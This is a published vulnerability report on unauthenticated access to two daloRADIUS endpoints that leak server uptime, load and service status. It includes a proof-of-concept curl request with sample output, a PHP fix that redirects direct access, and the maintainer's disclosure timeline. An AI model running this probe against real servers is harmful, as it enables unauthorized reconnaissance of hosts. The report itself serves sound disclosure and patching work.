Sensitive system information disclosure in lirantal/daloradius

Valid

Reported on

Dec 7th 2022


Description

An unauthenticated user can gather information on the remote system just by visiting the following endpoints:

  • /library/exten-radius_server_info.php (which reveals pieces of information such as system uptime, CPU load, etc.)
  • /library/exten-server_info.php (which reveals if mysql and/or freeradius are currently running)

Proof of Concept

$ curl http://<hostname>/library/exten-server_info.php
<h3>General Information</h3>
<table class='summarySection'>
  <tr>
    <td class='summaryKey'> Uptime </td>
    <td class='summaryValue'><span class='sleft'>69  days 2  hours 24  minutes </span> </td>
  </tr>
  <tr>
    <td class='summaryKey'> System Load </td>
    <td class='summaryValue'><span class='sleft'>0.14 0.14 0.10<br/>Tasks:  29 total,   1 running,  28 sleeping,   0 stopped,   0 zombie<br/>%Cpu(s):  0.0 us,  0.0 sy,  0.0 ni,100.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st</span> </td>
  </tr>
...

Impact

This vulnerability makes easier for an attacker to gather information on the system hosting an instance of the vulnerable web application.

Fix

The issues have been corrected in the master branch. In particular, at the very beginning of each vulnerable file - exten-server_info.php and exten-radius_server_info.php - the following lines of code implement an authorization check:

...
$extension_file = '/library/exten-server_info.php';
if (strpos($_SERVER['PHP_SELF'], $extension_file) !== false) {
    header("Location: ../index.php");
    exit;
}
...
We are processing your report and will contact the lirantal/daloradius team within 24 hours. a year ago
We have contacted a member of the lirantal/daloradius team and are waiting to hear back a year ago
Liran Tal gave praise a year ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
lirantal/daloradius maintainer has acknowledged this report a year ago
Liran Tal validated this vulnerability a year ago
filippolauria has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Liran Tal marked this as fixed in master branch with commit 3d11f3 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
to join this conversation